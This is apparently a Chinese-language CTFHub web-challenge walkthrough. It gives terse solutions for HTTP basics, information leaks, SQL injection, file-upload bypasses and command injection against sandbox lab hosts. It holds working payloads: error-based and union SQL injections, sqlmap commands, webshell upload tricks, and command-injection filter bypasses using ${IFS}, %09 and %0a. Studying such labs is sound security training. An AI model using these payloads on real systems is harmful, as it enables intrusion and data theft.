【CTFHUB】Web技能树

Web

HTTP协议

请求方式

302跳转

cookie

基础认证

响应包源代码

信息泄露

目录遍历

phpinfo

备份文件下载

网站源码

bak文件

vim缓存

下载下来放到linux中

在文件前面加的点(.)   .index.php.swp

然后运行 vi -r index.php

.DS_Store

记事本打开

Git泄露

Log

python git_extract.py http://challenge-8cff71d12c02de35.sandbox.ctfhub.com:10080/.git/

Stash

同上

 

Index

同上

SVN泄露

使用dvcs-ripper工具

HG泄露

使用dvcs-ripper工具

密码口令

弱口令

admin 123456

默认口令

百度搜索亿邮邮件网关默认口令

SQL注入

整数型注入

字符型注入

报错注入

extractvalue函数报错:       1 and ( extractvalue( ‘anything’,concat( ‘~’, (select database()) ) ) );

updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

只能显示32位:

substr(字符串,开始位置,长度)

布尔盲注

sqlmap

sqlmap -u ” http://challenge-520521e9124c0be8.sandbox.ctfhub.com:10080/?id=1 ” –dbs -technique B

数据库 sqli   表 flag   字段 flag

时间盲注

sqlmap

sqlmap -u ” http://challenge-58442e11e1306e17.sandbox.ctfhub.com:10080/?id=1 ” –dbs -technique T

MySQL结构

-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;

cookie注入

sqlmap -u ” http://challenge-52d3494f9e4a406f.sandbox.ctfhub.com:10080/ ” –cookie “id=1” –level 2 –dbs

UA注入

user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#

sqlmap: 

sqlmap -u ” http://challenge-f7a6b5d5665981cc.sandbox.ctfhub.com:10080/ ” –user-agent “123” –level 3 –dbs -technique U –dbms

Refer注入

同上,只不过在referer中输入SQL语句

XSS

反射型

文件上传

无验证

前端验证

把PHP文件后缀改为jpg,抓包再改回php

.htaccess

上传.htaccess和hhh.jpg

MIME绕过

正常上传,抓包,将content-type改为 image/jpeg

00截断

双写后缀

文件头检测

将一句话马改为jpg后缀,抓包,修改后缀为php,并添加gif头

RCE

命令注入

127.0.0.1 & ls

过滤cat

127.0.0.1 & more flag_162822816029866.php

过滤空格

使用${IFS}代替空格(可以代替空格的有IFS$9、%09、%0a、、、{,}、${IFS}等)

过滤目录分隔符

使用;符号分割命令

127.0.0.1 & ls

发现flag_is_here目录

127.0.0.1 & cd flag_is_here;ls

发现flag_44052408916433.php文件

127.0.0.1& cd flag_is_here;ls;cat flag_44052408916433.php

查看源代码得到flag

过滤运算符

127.0.0.1 ; cat flag_991932693945.php

综合过滤练习

过滤了|,&,;, ,/,cat,flag,ctfhub

%0a(换行符)可以代替;符号,但是要在url处输入,不然会被再次转义

%09或者${IFS}等,可以替代空格

通配符 *   ?

127.0.0.1%09%0a%09cd%09fla?_is_here%0amore%09fla?_260832613315632.php#